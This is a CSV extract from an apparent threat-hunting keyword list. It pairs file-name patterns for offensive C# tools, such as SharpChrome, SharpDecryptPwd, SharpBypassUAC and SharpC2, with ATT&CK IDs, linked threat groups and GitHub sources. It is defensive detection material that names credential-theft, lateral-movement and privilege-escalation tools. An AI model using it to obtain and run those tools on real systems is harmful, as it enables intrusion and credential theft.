"*\SharpBlock.exe*",".{0,1000}\\SharpBlock\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","18445"
"*\SharpBruteForceSSH-main*","\\SharpBruteForceSSH\-main","offensive_tool_keyword","SharpBruteForceSSH","simple SSH brute force tool ","T1110.003 - T1078","TA0006 ","N/A","N/A","Credential Access","https://github.com/HernanRodriguez1/SharpBruteForceSSH","1","0","N/A","N/A","9","1","60","10","2024-04-28T17:56:33Z","2024-04-25T20:06:05Z","18446"
"*\SharpBuster.csproj*",".{0,1000}\\SharpBuster\.csproj.{0,1000}","offensive_tool_keyword","SharpBuster","This is a C# implementation of a directory brute forcing tool designed to allow for in-memory execution","T1087 - T1112 - T1048.003 - T1105","TA0007 - TA0040 - TA0002","N/A","N/A","Discovery","https://github.com/passthehashbrowns/SharpBuster","1","0","N/A","N/A","7","1","62","7","2020-09-02T15:46:03Z","2020-08-31T00:33:02Z","18447"
"*\SharpBuster.dll*",".{0,1000}\\SharpBuster\.dll.{0,1000}","offensive_tool_keyword","SharpBuster","This is a C# implementation of a directory brute forcing tool designed to allow for in-memory execution","T1087 - T1112 - T1048.003 - T1105","TA0007 - TA0040 - TA0002","N/A","N/A","Discovery","https://github.com/passthehashbrowns/SharpBuster","1","0","N/A","N/A","7","1","62","7","2020-09-02T15:46:03Z","2020-08-31T00:33:02Z","18448"
"*\SharpBuster.exe*",".{0,1000}\\SharpBuster\.exe.{0,1000}","offensive_tool_keyword","SharpBuster","This is a C# implementation of a directory brute forcing tool designed to allow for in-memory execution","T1087 - T1112 - T1048.003 - T1105","TA0007 - TA0040 - TA0002","N/A","N/A","Discovery","https://github.com/passthehashbrowns/SharpBuster","1","0","N/A","N/A","7","1","62","7","2020-09-02T15:46:03Z","2020-08-31T00:33:02Z","18449"
"*\SharpBuster.pdb*",".{0,1000}\\SharpBuster\.pdb.{0,1000}","offensive_tool_keyword","SharpBuster","This is a C# implementation of a directory brute forcing tool designed to allow for in-memory execution","T1087 - T1112 - T1048.003 - T1105","TA0007 - TA0040 - TA0002","N/A","N/A","Discovery","https://github.com/passthehashbrowns/SharpBuster","1","0","N/A","N/A","7","1","62","7","2020-09-02T15:46:03Z","2020-08-31T00:33:02Z","18450"
"*\SharpBuster.sln*",".{0,1000}\\SharpBuster\.sln.{0,1000}","offensive_tool_keyword","SharpBuster","This is a C# implementation of a directory brute forcing tool designed to allow for in-memory execution","T1087 - T1112 - T1048.003 - T1105","TA0007 - TA0040 - TA0002","N/A","N/A","Discovery","https://github.com/passthehashbrowns/SharpBuster","1","0","N/A","N/A","7","1","62","7","2020-09-02T15:46:03Z","2020-08-31T00:33:02Z","18451"
"*\SharpBypassUAC.exe*",".{0,1000}\\SharpBypassUAC\.exe.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","18452"
"*\SharpBypassUAC.exe*",".{0,1000}\\SharpBypassUAC\.exe.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","0","N/A","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","18453"
"*\SharpBypassUAC.exe*",".{0,1000}\\SharpBypassUAC\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","18454"
"*\SharpC2*",".{0,1000}\\SharpC2.{0,1000}","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105  -  T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","0","N/A","N/A","10","10","399","57","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z","18455"
"*\SharpChassisType.exe*",".{0,1000}\\SharpChassisType\.exe.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","18456"
"*\SharpCheckInfo.exe*",".{0,1000}\\SharpCheckInfo\.exe.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","18457"
"*\SharpChisel.exe*",".{0,1000}\\SharpChisel\.exe.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","0","N/A","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","18458"
"*\SharpChisel.exe*",".{0,1000}\\SharpChisel\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","18459"
"*\SharpChrome.exe*",".{0,1000}\\SharpChrome\.exe.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","0","N/A","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","18460"
"*\SharpChrome.exe*",".{0,1000}\\SharpChrome\.exe.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","SharpChrome","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","18461"
"*\SharpChrome.exe*",".{0,1000}\\SharpChrome\.exe.{0,1000}","offensive_tool_keyword","SharpChrome","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","SharpChrome","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","18462"
"*\SharpChrome.exe*",".{0,1000}\\SharpChrome\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","18463"
"*\SharpChrome.exe*",".{0,1000}\\SharpChrome\.exe.{0,1000}","offensive_tool_keyword","SharpPack","collection of C# tools that include functionalities like Kerberoasting - ticket manipulation - Mimikatz - privilege escalation - domain enumeration and more","T1558.003 - T1003 - T1059.004 - T1078 - T1212 - T1087 - T1016 - T1071 - T1555 - T1203","TA0003 - TA0004 - TA0006 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation tool","https://github.com/Lexus89/SharpPack","1","0","N/A","N/A","10","1","78","19","2019-08-12T13:25:25Z","2018-10-01T12:45:16Z","18464"
"*\SharpChrome.pdb*",".{0,1000}\\SharpChrome\.pdb.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","SharpChrome","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","18465"
"*\SharpChrome.pdb*",".{0,1000}\\SharpChrome\.pdb.{0,1000}","offensive_tool_keyword","SharpChrome","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","SharpChrome","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","18466"
"*\SharpChromium.exe*",".{0,1000}\\SharpChromium\.exe.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","18467"
"*\SharpChromium.exe*",".{0,1000}\\SharpChromium\.exe.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","0","N/A","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","18468"
"*\SharpChromium.exe*",".{0,1000}\\SharpChromium\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","18469"
"*\SharpChromium\*",".{0,1000}\\SharpChromium\\.{0,1000}","offensive_tool_keyword","SharpChromium",".NET 4.0 CLR Project to retrieve Chromium data such as cookies - history and saved logins.","T1555.003 - T1114.001 - T1555.004","TA0006 - TA0003","N/A","COZY BEAR","Credential Access","https://github.com/djhohnstein/SharpChromium","1","0","N/A","N/A","10","8","712","100","2020-10-23T22:28:13Z","2018-08-06T21:25:21Z","18470"
"*\SharpClipboard.csproj*",".{0,1000}\\SharpClipboard\.csproj.{0,1000}","offensive_tool_keyword","SharpClipboard","monitor the content of the clipboard continuously","T1115","TA0006 - TA0009","N/A","N/A","Credential Access","http://github.com/slyd0g/SharpClipboard","1","0","N/A","N/A","8","1","N/A","N/A","N/A","N/A","18471"
"*\SharpClipboard.sln*",".{0,1000}\\SharpClipboard\.sln.{0,1000}","offensive_tool_keyword","SharpClipboard","monitor the content of the clipboard continuously","T1115","TA0006 - TA0009","N/A","N/A","Credential Access","http://github.com/slyd0g/SharpClipboard","1","0","N/A","N/A","8","1","N/A","N/A","N/A","N/A","18472"
"*\SharpClipboard\*",".{0,1000}\\SharpClipboard\\.{0,1000}","offensive_tool_keyword","SharpClipboard","monitor the content of the clipboard continuously","T1115","TA0006 - TA0009","N/A","N/A","Credential Access","http://github.com/slyd0g/SharpClipboard","1","0","N/A","N/A","8","1","N/A","N/A","N/A","N/A","18473"
"*\SharpClipHistory.exe*",".{0,1000}\\SharpClipHistory\.exe.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","18474"
"*\SharpCloud.exe*",".{0,1000}\\SharpCloud\.exe.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","18475"
"*\SharpCloud.exe*",".{0,1000}\\SharpCloud\.exe.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","0","N/A","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","18476"
"*\SharpCloud.exe*",".{0,1000}\\SharpCloud\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","18477"
"*\SharpCOM.csproj*",".{0,1000}\\SharpCOM\.csproj.{0,1000}","offensive_tool_keyword","SharpCOM","DCOM Lateral Movement","T1175","TA0008","N/A","N/A","Lateral Movement","https://github.com/rvrsh3ll/SharpCOM","1","0","N/A","N/A","10","2","128","30","2019-09-16T22:52:53Z","2018-12-13T15:10:55Z","18478"
"*\SharpCOM.exe*",".{0,1000}\\SharpCOM\.exe.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","0","N/A","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","18479"
"*\SharpCOM.exe*",".{0,1000}\\SharpCOM\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","18480"
"*\SharpCOM.exe*",".{0,1000}\\SharpCOM\.exe.{0,1000}","offensive_tool_keyword","SharpCOM","DCOM Lateral Movement","T1175","TA0008","N/A","N/A","Lateral Movement","https://github.com/rvrsh3ll/SharpCOM","1","0","N/A","N/A","10","2","128","30","2019-09-16T22:52:53Z","2018-12-13T15:10:55Z","18481"
"*\SharpCOM.sln*",".{0,1000}\\SharpCOM\.sln.{0,1000}","offensive_tool_keyword","SharpCOM","DCOM Lateral Movement","T1175","TA0008","N/A","N/A","Lateral Movement","https://github.com/rvrsh3ll/SharpCOM","1","0","N/A","N/A","10","2","128","30","2019-09-16T22:52:53Z","2018-12-13T15:10:55Z","18482"
"*\SharpCookieMonster.exe*",".{0,1000}\\SharpCookieMonster\.exe.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","0","N/A","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","18483"
"*\SharpCookieMonster.exe*",".{0,1000}\\SharpCookieMonster\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","18484"
"*\SharpCrashEventLog.exe*",".{0,1000}\\SharpCrashEventLog\.exe.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","18485"
"*\SharpCrashEventLog.exe*",".{0,1000}\\SharpCrashEventLog\.exe.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","0","N/A","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","18486"
"*\SharpCrashEventLog.exe*",".{0,1000}\\SharpCrashEventLog\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","18487"
"*\SharpDecryptPwd.exe*",".{0,1000}\\SharpDecryptPwd\.exe.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","18488"
"*\SharpDecryptPwd.sln*",".{0,1000}\\SharpDecryptPwd\.sln.{0,1000}","offensive_tool_keyword","SharpDecryptPwd","Decrypt Navicat,Xmanager,Filezilla,Foxmail,WinSCP,etc","T1003.008 - T1555.004 - T1552.002","TA0006","N/A","N/A","Credential Access","https://github.com/RowTeam/SharpDecryptPwd","1","0","N/A","N/A","10","8","769","117","2022-03-04T02:49:31Z","2022-02-25T11:21:43Z","18489"
"*\SharpDecryptPwd\*",".{0,1000}\\SharpDecryptPwd\\.{0,1000}","offensive_tool_keyword","SharpDecryptPwd","Decrypt Navicat,Xmanager,Filezilla,Foxmail,WinSCP,etc","T1003.008 - T1555.004 - T1552.002","TA0006","N/A","N/A","Credential Access","https://github.com/RowTeam/SharpDecryptPwd","1","0","N/A","N/A","10","8","769","117","2022-03-04T02:49:31Z","2022-02-25T11:21:43Z","18490"
"*\SharpDecryptPwd2.exe*",".{0,1000}\\SharpDecryptPwd2\.exe.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","18491"
"*\SharpDecryptPwd-main*",".{0,1000}\\SharpDecryptPwd\-main.{0,1000}","offensive_tool_keyword","SharpDecryptPwd","Decrypt Navicat,Xmanager,Filezilla,Foxmail,WinSCP,etc","T1003.008 - T1555.004 - T1552.002","TA0006","N/A","N/A","Credential Access","https://github.com/RowTeam/SharpDecryptPwd","1","0","N/A","N/A","10","8","769","117","2022-03-04T02:49:31Z","2022-02-25T11:21:43Z","18492"
